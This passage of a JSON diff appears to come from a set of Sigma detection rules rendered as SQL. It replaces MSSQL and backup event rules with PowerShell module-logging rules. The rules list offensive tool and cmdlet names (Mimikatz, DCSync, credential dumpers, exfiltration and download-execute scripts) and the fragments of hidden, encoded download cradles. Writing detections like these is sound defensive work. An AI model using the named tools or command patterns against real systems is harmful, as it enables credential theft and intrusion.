'326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_esent_ntdsutil_abuse.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "title": "Suspicious Get Information for SMB Share - PowerShell Module", + "id": "6942bd25-5970-40ab-af49-944247103358", "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + "Administrator script" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-smbshare%' ESCAPE '\\' OR ContextInfo LIKE '%get-smbshare%' ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_susp_smb_share_reco.yml" }, { - "title": "Dump Ntds.dit To Suspicious Location", - "id": "94dc4390-6b7c-4784-8ffc-335334404650", - "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", + "id": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", + "status": "test", + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "author": "frack113", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Administrator script" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR ContextInfo LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (Payload LIKE '%get-aduser%' ESCAPE '\\' AND Payload LIKE '%-f %' ESCAPE '\\' AND Payload LIKE '%-pr %' ESCAPE '\\' AND Payload LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\') OR (ContextInfo LIKE '%get-aduser%' ESCAPE '\\' AND ContextInfo LIKE '%-f %' ESCAPE '\\' AND ContextInfo LIKE '%-pr %' ESCAPE '\\' AND ContextInfo LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" ], - "filename": "win_esent_ntdsutil_abuse_susp_location.yml" + "filename": "posh_pm_susp_ad_group_reco.yml" }, { - "title": "Backup Catalog Deleted", - "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", "status": "test", - "description": "Detects backup catalog deletions", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "win_susp_backup_delete.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSI Installation From Suspicious Locations", - "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", + "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "status": "experimental", - "description": "Detects MSI package installation from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "win_msi_install_from_susp_locations.yml" + "filename": "posh_pm_invoke_obfuscation_via_compress.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' 